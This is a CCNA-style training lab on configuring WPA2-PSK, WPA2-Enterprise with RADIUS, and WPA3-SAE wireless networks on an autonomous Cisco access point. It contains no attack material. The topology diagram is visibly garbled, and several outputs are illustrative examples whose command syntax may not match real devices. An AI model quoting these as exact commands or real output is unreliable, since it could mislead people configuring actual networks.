Back
Lesson 4 of 5

Wireless Security Modes

Lab Objectives

  • Configure and compare three wireless security modes: WPA2-PSK, WPA2-Enterprise (RADIUS), and WPA3 on an autonomous access point.
  • Explain the theory behind each security mode and verify client association and authentication.
  • Understand production considerations for choosing a wireless security mode.

Lab Tasks (Try It Yourself First!)

Complete these tasks WITHOUT looking at the solution below. Use ? and show commands to figure it out.

Task 1: Configure WPA2-PSK

Create an SSID "NHPREP-SALES" mapped to VLAN 10 (192.168.1.0/24) and secure it using WPA2-PSK with passphrase Lab@123. Allow only AES-based encryption (WPA2).

Task 2: Configure WPA2-Enterprise (RADIUS)

Create an SSID "NHPREP-ENG" mapped to VLAN 20 (192.168.2.0/24) using WPA2-Enterprise that authenticates clients against a RADIUS server at 192.168.3.250 (management VLAN). Use shared secret Lab@123.

Task 3: Configure WPA3

Create an SSID "NHPREP-MGMT" mapped to VLAN 30 (192.168.3.0/24) secured with WPA3-SAE (Simultaneous Authentication of Equals). Use passphrase Lab@123.

Think About It: Why is WPA2-Enterprise (RADIUS) typically preferred in enterprise networks compared to WPA2-PSK? What trade-offs does WPA3 introduce for legacy devices in your network?

BASE LAB TOPOLOGY (use this EXACT topology for all CCNA labs)

                [Internet]
               203.0.113.1
                    |
               R1 (Gateway)
              Gi0/0: 10.10.10.1
              Gi0/1: 10.10.20.1
              Gi0/2: 10.10.30.1
              /     |     \
           R2      R3      R4

Gi0/0: 10.10.10.2 | Gi0/0: 10.10.30.2 Gi0/1: 10.10.40.1 | / \ | S1 S2 S3 / \ | /
PC1 PC2 PC3 PC4 PC5

IP SCHEME:

  • 10.10.10.0/24 — R1-R2 link
  • 10.10.20.0/24 — R1-R3 link
  • 10.10.30.0/24 — R1-R4 link
  • 10.10.40.0/24 — R2-S1 link
  • 192.168.1.0/24 — VLAN 10 (Sales)
  • 192.168.2.0/24 — VLAN 20 (Engineering)
  • 192.168.3.0/24 — VLAN 30 (Management)
  • 203.0.113.0/24 — Public/Internet simulation

Tip: In this lab we assume an autonomous AP connected to S2. The AP bridges wireless clients onto the configured VLANs. The RADIUS server resides in VLAN 30 at 192.168.3.250.

Lab Solution

Task 1 Solution: Configure WPA2-PSK

What we are doing: Create SSID NHPREP-SALES on the AP, bind it to VLAN 10 (Sales) and protect it with WPA2-PSK using AES. WPA2-PSK is simple to deploy for small networks and uses a shared passphrase for all clients.

configure terminal
!
dot11 ssid NHPREP-SALES
  vlan 10
  authentication open
  authentication key-management wpa version 2
  wpa-psk ascii Lab@123
!
interface Dot11Radio0
  ssid NHPREP-SALES
!
interface GigabitEthernet0
  switchport mode trunk
  switchport trunk allowed vlan 10
  no shutdown
end

What the commands do and why they matter:

  • dot11 ssid NHPREP-SALES — creates the wireless network profile (SSID). An SSID groups wireless security and VLAN settings.
  • vlan 10 — maps the SSID to VLAN 10 so wireless clients receive IPs in 192.168.1.0/24 in production this isolates Sales traffic.
  • authentication open — uses open association (802.11) but enforces encryption via WPA2 key management.
  • authentication key-management wpa version 2 — enforces WPA2 (IEEE 802.11i) for stronger encryption than WPA.
  • wpa-psk ascii Lab@123 — sets the pre-shared key used by clients to derive encryption keys.
  • interface Dot11Radio0 / ssid ... — ties the SSID to the radio so the AP advertises it.
  • interface GigabitEthernet0 trunk config — ensures VLAN 10 frames are carried to the wired network.

Verify:

show dot11 ssid

Expected output (example):

SSID name: NHPREP-SALES
  SSID admin state: enabled
  Authentication: OPEN
  WPA version: WPA2
  WPA key management: PSK
  WPA PSK: configured
  VLAN: 10

show dot11 associations

Expected output when a client is associated:

Number of clients: 1
Client MAC       AP RF  SSID           VLAN  IPv4 Address
00:11:22:33:44:55 Dot11Radio0 NHPREP-SALES 10   192.168.1.10

Task 2 Solution: Configure WPA2-Enterprise (RADIUS)

What we are doing: Configure the AP to use a RADIUS server (192.168.3.250) to authenticate clients for SSID NHPREP-ENG on VLAN 20. WPA2-Enterprise uses unique credentials (e.g., username/password or certificates) per user and is scalable and auditable — ideal for enterprise use.

configure terminal
!
aaa new-model
!
radius server NHPREP-RADIUS
  address ipv4 192.168.3.250 auth-port 1812
  key Lab@123
!
dot11 ssid NHPREP-ENG
  vlan 20
  authentication open
  authentication key-management wpa version 2
  authentication server-group radius
!
interface Dot11Radio0
  ssid NHPREP-ENG
end

What the commands do and why they matter:

  • aaa new-model — enables AAA on the device; required to use external authentication servers in production.
  • radius server NHPREP-RADIUS ... key Lab@123 — defines the RADIUS server IP and shared secret; this is how the AP and RADIUS server mutually authenticate.
  • authentication server-group radius — tells the SSID to use the RADIUS server group for authenticating client credentials.
  • Mapping SSID to VLAN 20 isolates Engineering traffic onto 192.168.2.0/24.

Verify:

show radius servers

Expected output:

Radius server NHPREP-RADIUS
  Address: 192.168.3.250
  Auth port: 1812
  Key: configured
  Status: reachable

show dot11 ssid

Expected snippet:

SSID name: NHPREP-ENG
  SSID admin state: enabled
  Authentication: OPEN
  WPA version: WPA2
  WPA key management: 802.1X (RADIUS)
  VLAN: 20

show aaa sessions

Expected output when a client is authenticating:

Username          Service     State     Client IP     NAS Port
alice             dot1x       Authorized 192.168.2.50 Dot11Radio0

Task 3 Solution: Configure WPA3

What we are doing: Create SSID NHPREP-MGMT on VLAN 30 using WPA3-SAE (SAE = Simultaneous Authentication of Equals). WPA3 improves handshake security and protects weak passphrases, but some older clients may not support it.

configure terminal
!
dot11 ssid NHPREP-MGMT
  vlan 30
  authentication open
  authentication key-management sae
  sae-psk ascii Lab@123
!
interface Dot11Radio0
  ssid NHPREP-MGMT
end

What the commands do and why they matter:

  • authentication key-management sae — selects WPA3-SAE for password-based authentication (replacing PSK/WPA2 PSK).
  • sae-psk ascii Lab@123 — configures the passphrase for WPA3-SAE.
  • Mapping to VLAN 30 isolates management traffic; in production, management SSIDs are often limited to specific radios and use strong encryption or enterprise auth.

Verify:

show dot11 ssid

Expected snippet:

SSID name: NHPREP-MGMT
  SSID admin state: enabled
  Authentication: OPEN
  WPA version: WPA3-SAE
  Key management: SAE (PSK)
  VLAN: 30

show dot11 associations

If a WPA3 client is associated:

Number of clients: 1
Client MAC       AP RF  SSID           VLAN  IPv4 Address  Auth Method
66:77:88:99:AA:BB Dot11Radio0 NHPREP-MGMT 30   192.168.3.20  SAE

Troubleshooting Scenario

Scenario: RADIUS authentication fails for NHPREP-ENG

Symptom: Client cannot connect to NHPREP-ENG; wireless client reports "authentication failed."

Your task: Find and fix the issue.

Hint: Check shared secret and reachability between AP and RADIUS server.

Solution:

  • On the AP, verify RADIUS server settings and test connectivity:
show radius servers
ping 192.168.3.250
  • If the show radius servers output shows Key: configured but Status: unreachable, likely network/VLAN/trunk issue—ensure the AP management/ trunk carries VLAN 30 and the RADIUS server is reachable in VLAN 30.
  • If the server is reachable, confirm the shared secret matches the RADIUS server. Update the secret on either side to Lab@123 so they match.
  • After fixing, retry connection. Verify with:
show aaa sessions
show dot11 associations

Explanation: Most RADIUS failures are due to incorrect shared secret or ACL/VLAN misconfiguration blocking UDP 1812. In production, ensure RADIUS servers are on redundant hosts and firewall rules allow the ports.

Verification Checklist

  • SSID NHPREP-SALES exists and shows WPA2-PSK, VLAN 10.
  • SSID NHPREP-ENG exists and authenticates via RADIUS, VLAN 20.
  • SSID NHPREP-MGMT exists and uses WPA3-SAE, VLAN 30.
  • RADIUS server 192.168.3.250 is reachable from AP and uses shared key Lab@123.

Common Mistakes

SymptomCauseFix
Client cannot join WPA2-PSK SSIDWrong passphrase entered on client or APRe-enter the passphrase; ensure wpa-psk ascii matches Lab@123
RADIUS authentication times outVLAN/trunk not carrying management VLAN or UDP 1812 blockedVerify trunk allowed VLAN 30 and ping 192.168.3.250; allow UDP 1812/1645 through firewall
Client cannot use WPA3 SSIDClient device does not support WPA3Use WPA2/WPA3 transitional mode in production or provide separate WPA2 SSID for legacy devices
SSID mapped to wrong VLANMis-typed vlan under dot11 ssidReconfigure dot11 ssid ... vlan <correct> to the intended VLAN ID

Challenge Task

Configure the AP so that NHPREP-ENG (WPA2-Enterprise) and NHPREP-MGMT (WPA3) are both advertised on the same radio but limit NHPREP-MGMT to allow only devices whose MAC addresses are pre-registered (MAC filtering). Implement this without using a RADIUS MAC-auth server — instead, configure local MAC ACL on the AP. (Goal only — you must determine the exact commands.)

Real-world note: In production, enterprises often use WPA2-Enterprise with EAP-TLS certificates for the strongest security and combine this with device posture checking. WPA3 provides better protection of weak passphrases, but rollout requires verifying client compatibility. Use RADIUS server redundancy and strong shared secrets (like Lab@123 only in labs) in production.

Practice with Hands-On Labs

30 step-by-step labs for CCNA, CCNP Enterprise & Security